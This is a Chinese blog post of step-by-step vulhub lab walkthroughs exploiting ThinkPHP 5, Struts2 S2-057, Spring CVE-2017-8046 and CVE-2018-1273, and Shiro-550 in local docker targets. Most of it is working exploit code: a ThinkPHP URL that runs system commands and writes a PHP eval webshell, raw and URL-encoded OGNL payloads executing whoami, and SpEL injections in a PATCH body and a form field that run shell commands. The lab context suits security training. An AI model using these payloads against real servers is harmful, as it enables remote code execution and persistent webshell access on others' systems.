5-rce
步骤一:环境部署
cd vulhub/thinkphp/5-rce
docker-compose up -d
步骤二:输入系统命令: whoami
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
步骤三:写入webshell到1.php
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php
进行访问
步骤四:进行蚁剑连接
s2-057
步骤一:环境部署
cd vulhub/struts2/s2-057
docker-compose up -d
靶机地址:/struts2-showcase
步骤二:在url处输入 http://172.16.1.38:8080/struts2-showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了
步骤三:利用BurpSuite抓包并改包,可以看到,123+123的结果已经在Location头中返回,说明存在漏洞。
原始poc
${
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
url编码后的poc
/struts2-showcase/$%7B%0A%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29%29.%[email protected]@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
CVE-2017-8046
步骤一:部署环境
cd vulhub/spring/CVE-2017-8046
docker-compose up -d
步骤二:访问/customers/1 然后抓取数据包,使用PATCH请求来修改
PATCH /customers/1 HTTP/1.1
Host: 172.16.1.56:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
步骤三:成功发送数据包之后,可以进入docker容器内查看是否执行命令
docker ps
docker exec -it [CONTAINER ID] /bin/bash
CVE-2018-1273
步骤一:部署环境
cd vulhub/spring/CVE-2018-1273
docker-compose up -d
访问环境:/users
步骤二:提交任意信息,抓包
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
docker ps
docker exec -it a34a202bc94d /bin/bash
得出zcc
Shiro-550
步骤一:部署环境
cd vulhub/shiro/CVE-2016-4437
docker-compose up -d
步骤二:验证Shiro框架
使用BurpSuite进行抓包,在请求包中的cookie字段中添加rememberMe=123:,看响应包header中是否返回rememberMe=deleteMe值,若有,则证明该系统使用了Shiro框架:
步骤三:利用工具
注入webshell
进行连接
标签:8046,s2,29%,28%,29,.%,步骤,docker,CVE From: https://blog.csdn.net/2301_82061181/article/details/142450480